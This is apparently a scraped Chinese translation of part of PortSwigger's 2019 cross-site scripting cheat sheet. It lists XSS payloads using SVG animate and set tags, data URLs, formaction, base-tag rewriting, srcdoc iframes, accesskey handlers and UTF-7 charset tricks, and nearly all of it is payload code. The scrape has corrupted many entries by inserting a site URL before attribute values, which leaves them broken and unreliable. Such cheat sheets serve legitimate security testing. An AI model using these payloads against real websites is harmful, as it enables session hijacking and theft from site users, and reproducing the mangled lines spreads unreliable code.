跨站脚本（XSS）备忘单-2019版 (4)

使用值的SVG动画标签

<svg><animate xlink:href=http://www.likecs.com/#xss attributeName=href values=http://www.likecs.com/javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG动画标签用于

<svg><animate xlink:href=http://www.likecs.com/#xss attributeName=href from=http://www.likecs.com/javascript:alert(1) to=http://www.likecs.com/1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG设置标签

<svg><set xlink:href=http://www.likecs.com/#xss attributeName=href from=? to=http://www.likecs.com/javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

脚本src中的数据协议

<script src="http://www.likecs.com/data:text/javascript,alert(1)"></script>

SVG脚本href属性，无需关闭脚本标签

<svg><script href=http://www.likecs.com/"http://www.likecs.com/data:text/javascript,alert(1)" />

SVG使用元素Chrome/Firefox

<svg><use href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' /></a></svg>#x"></use></svg>

带有数据URL的导入语句

<script>import('http://www.likecs.com/data:text/javascript,alert(1)')</script>

具有JavaScript协议的基本标记重写了相对URL

<base href="javascript:/a/-alert(1)///////"><a href=

MathML使任何标签都可点击

<math><x href=http://www.likecs.com/"javascript:alert(1)">blah

按钮和动作

<form><button formaction=http://www.likecs.com/javascript:alert(1)>XSS

输入和形式

<form><input type=submit formaction=http://www.likecs.com/javascript:alert(1) value=XSS>

形式与行动

<form action=http://www.likecs.com/javascript:alert(1)><input type=submit value=XSS>

Isindex和formaction

<isindex type=submit formaction=http://www.likecs.com/javascript:alert(1)>

index和action

<isindex type=submit action=http://www.likecs.com/javascript:alert(1)>

将元素与外部网址一起使用

<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg> 其他有用的属性

使用srcdoc属性

<iframe srcdoc="<img src=http://www.likecs.com/1 onerror=alert(1)>"></iframe>

对实体使用srcdoc

<iframe srcdoc="&lt;img src=http://www.likecs.com/1 onerror=alert(1)&gt;"></iframe>

在页面上的任何位置（甚至在表单外部）单击提交元素

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

隐藏的输入：访问键属性可以在通常无法利用的元素上启用XSS

<input type=http://www.likecs.com/"hidden" accesskey=http://www.likecs.com/"X" onclick=http://www.likecs.com/"alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

链接元素：访问键属性可以在通常无法利用的元素上启用XSS

<link rel=http://www.likecs.com/"canonical" accesskey=http://www.likecs.com/"X" onclick=http://www.likecs.com/"alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

下载属性可以保存当前网页的副本

<a href=http://www.likecs.com/# download="filename.html">Test</a>

使用Referrerpolicy禁用引荐来源网址

<img referrerpolicy=http://www.likecs.com/"no-referrer" src=http://www.likecs.com/"http://portswigger-labs.net"> 特殊标签

重定向到其他域

<meta http-equiv=http://www.likecs.com/"refresh" content=http://www.likecs.com/"0; url=http://www.likecs.com//portswigger-labs.net">

元字符集属性UTF-7

<meta charset=http://www.likecs.com/"UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

元字符集UTF-7

<meta http-equiv=http://www.likecs.com/"Content-Type" content=http://www.likecs.com/"text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM字符（必须在文档开头）1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM字符（必须在文档开头）2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM字符（必须在文档开头）3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM字符（必须在文档开头）4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

升级不安全的请求

<meta http-equiv=http://www.likecs.com/"Content-Security-Policy" content=http://www.likecs.com/"upgrade-insecure-requests">

通过iframe沙箱禁用JavaScript

<iframe sandbox src="http://portswigger-labs.net"></iframe>

禁用引荐来源

<meta name=http://www.likecs.com/"referrer" content=http://www.likecs.com/"no-referrer"> 编码方式